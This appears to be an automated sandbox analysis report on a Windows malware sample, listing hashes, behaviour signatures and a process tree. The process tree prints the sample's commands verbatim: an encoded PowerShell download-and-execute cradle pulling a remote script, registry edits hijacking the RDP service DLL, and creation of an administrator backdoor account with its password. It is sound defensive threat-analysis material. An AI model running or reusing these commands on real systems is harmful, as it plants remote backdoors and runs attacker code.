Analysis
-
max time kernel
143s -
max time network
143s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
17-11-2020 12:38
Static task
static1
Behavioral task
behavioral1
Sample
09fd827d8b404557a5c9e06810247c12.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
09fd827d8b404557a5c9e06810247c12.exe
Resource
win10v20201028
General
-
Target
09fd827d8b404557a5c9e06810247c12.exe
-
Size
3.4MB
-
MD5
afb57d5d065aaa204e8a5c6803bab72b
-
SHA1
5cd785582bba69f740a8943c02123e683a541b3b
-
SHA256
3126cbdac814b04d544ff02e968d2143b231bb6d981ff8bf1812f6314cca187e
-
SHA512
40bfdc844abc2f49e810ac63e6e6b739aa656830d3833292dd1b43456a8452aa7181d675e28e4f4bf0f920009e35b0d631ec39a25968f12b7335528c41181f98
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 17 1352 powershell.exe 19 1352 powershell.exe 20 1352 powershell.exe 21 1352 powershell.exe 23 1352 powershell.exe 25 1352 powershell.exe 27 1352 powershell.exe 29 1352 powershell.exe 31 1352 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 4044 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 3524 3524 -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A22.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A42.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI19B3.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_skstoarn.odq.psm1 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_nkrwmeci.zpm.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A53.tmp powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A12.tmp powershell.exe -
Modifies data under HKEY_USERS 217 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepid process 4044 powershell.exe 4044 powershell.exe 4044 powershell.exe 4044 powershell.exe 4044 powershell.exe 4044 powershell.exe 1352 powershell.exe 1352 powershell.exe 1352 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 616 616 -
Suspicious use of AdjustPrivilegeToken 77 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4044 powershell.exe Token: SeIncreaseQuotaPrivilege 4044 powershell.exe Token: SeSecurityPrivilege 4044 powershell.exe Token: SeTakeOwnershipPrivilege 4044 powershell.exe Token: SeLoadDriverPrivilege 4044 powershell.exe Token: SeSystemProfilePrivilege 4044 powershell.exe Token: SeSystemtimePrivilege 4044 powershell.exe Token: SeProfSingleProcessPrivilege 4044 powershell.exe Token: SeIncBasePriorityPrivilege 4044 powershell.exe Token: SeCreatePagefilePrivilege 4044 powershell.exe Token: SeBackupPrivilege 4044 powershell.exe Token: SeRestorePrivilege 4044 powershell.exe Token: SeShutdownPrivilege 4044 powershell.exe Token: SeDebugPrivilege 4044 powershell.exe Token: SeSystemEnvironmentPrivilege 4044 powershell.exe Token: SeRemoteShutdownPrivilege 4044 powershell.exe Token: SeUndockPrivilege 4044 powershell.exe Token: SeManageVolumePrivilege 4044 powershell.exe Token: 33 4044 powershell.exe Token: 34 4044 powershell.exe Token: 35 4044 powershell.exe Token: 36 4044 powershell.exe Token: SeIncreaseQuotaPrivilege 4044 powershell.exe Token: SeSecurityPrivilege 4044 powershell.exe Token: SeTakeOwnershipPrivilege 4044 powershell.exe Token: SeLoadDriverPrivilege 4044 powershell.exe Token: SeSystemProfilePrivilege 4044 powershell.exe Token: SeSystemtimePrivilege 4044 powershell.exe Token: SeProfSingleProcessPrivilege 4044 powershell.exe Token: SeIncBasePriorityPrivilege 4044 powershell.exe Token: SeCreatePagefilePrivilege 4044 powershell.exe Token: SeBackupPrivilege 4044 powershell.exe Token: SeRestorePrivilege 4044 powershell.exe Token: SeShutdownPrivilege 4044 powershell.exe Token: SeDebugPrivilege 4044 powershell.exe Token: SeSystemEnvironmentPrivilege 4044 powershell.exe Token: SeRemoteShutdownPrivilege 4044 powershell.exe Token: SeUndockPrivilege 4044 powershell.exe Token: SeManageVolumePrivilege 4044 powershell.exe Token: 33 4044 powershell.exe Token: 34 4044 powershell.exe Token: 35 4044 powershell.exe Token: 36 4044 powershell.exe Token: SeIncreaseQuotaPrivilege 4044 powershell.exe Token: SeSecurityPrivilege 4044 powershell.exe Token: SeTakeOwnershipPrivilege 4044 powershell.exe Token: SeLoadDriverPrivilege 4044 powershell.exe Token: SeSystemProfilePrivilege 4044 powershell.exe Token: SeSystemtimePrivilege 4044 powershell.exe Token: SeProfSingleProcessPrivilege 4044 powershell.exe Token: SeIncBasePriorityPrivilege 4044 powershell.exe Token: SeCreatePagefilePrivilege 4044 powershell.exe Token: SeBackupPrivilege 4044 powershell.exe Token: SeRestorePrivilege 4044 powershell.exe Token: SeShutdownPrivilege 4044 powershell.exe Token: SeDebugPrivilege 4044 powershell.exe Token: SeSystemEnvironmentPrivilege 4044 powershell.exe Token: SeRemoteShutdownPrivilege 4044 powershell.exe Token: SeUndockPrivilege 4044 powershell.exe Token: SeManageVolumePrivilege 4044 powershell.exe Token: 33 4044 powershell.exe Token: 34 4044 powershell.exe Token: 35 4044 powershell.exe Token: 36 4044 powershell.exe -
Suspicious use of WriteProcessMemory 68 IoCs
Processes:
09fd827d8b404557a5c9e06810247c12.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1628 wrote to memory of 4044 1628 09fd827d8b404557a5c9e06810247c12.exe powershell.exe PID 1628 wrote to memory of 4044 1628 09fd827d8b404557a5c9e06810247c12.exe powershell.exe PID 4044 wrote to memory of 1892 4044 powershell.exe csc.exe PID 4044 wrote to memory of 1892 4044 powershell.exe csc.exe PID 1892 wrote to memory of 2792 1892 csc.exe cvtres.exe PID 1892 wrote to memory of 2792 1892 csc.exe cvtres.exe PID 4044 wrote to memory of 3788 4044 powershell.exe reg.exe PID 4044 wrote to memory of 3788 4044 powershell.exe reg.exe PID 4044 wrote to memory of 3808 4044 powershell.exe reg.exe PID 4044 wrote to memory of 3808 4044 powershell.exe reg.exe PID 4044 wrote to memory of 3496 4044 powershell.exe reg.exe PID 4044 wrote to memory of 3496 4044 powershell.exe reg.exe PID 4044 wrote to memory of 492 4044 powershell.exe net.exe PID 4044 wrote to memory of 492 4044 powershell.exe net.exe PID 492 wrote to memory of 4040 492 net.exe net1.exe PID 492 wrote to memory of 4040 492 net.exe net1.exe PID 4044 wrote to memory of 2184 4044 powershell.exe cmd.exe PID 4044 wrote to memory of 2184 4044 powershell.exe cmd.exe PID 2184 wrote to memory of 3876 2184 cmd.exe cmd.exe PID 2184 wrote to memory of 3876 2184 cmd.exe cmd.exe PID 3876 wrote to memory of 3904 3876 cmd.exe net.exe PID 3876 wrote to memory of 3904 3876 cmd.exe net.exe PID 3904 wrote to memory of 3868 3904 net.exe net1.exe PID 3904 wrote to memory of 3868 3904 net.exe net1.exe PID 4044 wrote to memory of 2852 4044 powershell.exe cmd.exe PID 4044 wrote to memory of 2852 4044 powershell.exe cmd.exe PID 2852 wrote to memory of 2888 2852 cmd.exe cmd.exe PID 2852 wrote to memory of 2888 2852 cmd.exe cmd.exe PID 2888 wrote to memory of 1532 2888 cmd.exe net.exe PID 2888 wrote to memory of 1532 2888 cmd.exe net.exe PID 1532 wrote to memory of 2208 1532 net.exe net1.exe PID 1532 wrote to memory of 2208 1532 net.exe net1.exe PID 3612 wrote to memory of 420 3612 cmd.exe net.exe PID 3612 wrote to memory of 420 3612 cmd.exe net.exe PID 420 wrote to memory of 3996 420 net.exe net1.exe PID 420 wrote to memory of 3996 420 net.exe net1.exe PID 208 wrote to memory of 396 208 cmd.exe net.exe PID 208 wrote to memory of 396 208 cmd.exe net.exe PID 396 wrote to memory of 1236 396 net.exe net1.exe PID 396 wrote to memory of 1236 396 net.exe net1.exe PID 2096 wrote to memory of 3804 2096 cmd.exe net.exe PID 2096 wrote to memory of 3804 2096 cmd.exe net.exe PID 3804 wrote to memory of 3436 3804 net.exe net1.exe PID 3804 wrote to memory of 3436 3804 net.exe net1.exe PID 1840 wrote to memory of 1356 1840 cmd.exe net.exe PID 1840 wrote to memory of 1356 1840 cmd.exe net.exe PID 1356 wrote to memory of 2716 1356 net.exe net1.exe PID 1356 wrote to memory of 2716 1356 net.exe net1.exe PID 3884 wrote to memory of 2080 3884 cmd.exe net.exe PID 3884 wrote to memory of 2080 3884 cmd.exe net.exe PID 2080 wrote to memory of 2244 2080 net.exe net1.exe PID 2080 wrote to memory of 2244 2080 net.exe net1.exe PID 3548 wrote to memory of 420 3548 cmd.exe net.exe PID 3548 wrote to memory of 420 3548 cmd.exe net.exe PID 420 wrote to memory of 1036 420 net.exe net1.exe PID 420 wrote to memory of 1036 420 net.exe net1.exe PID 632 wrote to memory of 208 632 cmd.exe WMIC.exe PID 632 wrote to memory of 208 632 cmd.exe WMIC.exe PID 3788 wrote to memory of 3812 3788 cmd.exe WMIC.exe PID 3788 wrote to memory of 3812 3788 cmd.exe WMIC.exe PID 2284 wrote to memory of 1840 2284 cmd.exe cmd.exe PID 2284 wrote to memory of 1840 2284 cmd.exe cmd.exe PID 1840 wrote to memory of 1352 1840 cmd.exe powershell.exe PID 1840 wrote to memory of 1352 1840 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\09fd827d8b404557a5c9e06810247c12.exe"C:\Users\Admin\AppData\Local\Temp\09fd827d8b404557a5c9e06810247c12.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xlpsxo0v\xlpsxo0v.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES95FC.tmp" "c:\Users\Admin\AppData\Local\Temp\xlpsxo0v\CSCDA13A91742D475390F7D6E7FB1B50AF.TMP"4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin Ghasar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin Ghasar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin Ghasar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin k1x2hnfU /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin k1x2hnfU /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin k1x2hnfU /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" updwin /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" updwin /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" updwin /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin k1x2hnfU1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin k1x2hnfU2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin k1x2hnfU3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
- Suspicious use of WriteProcessMemory
-
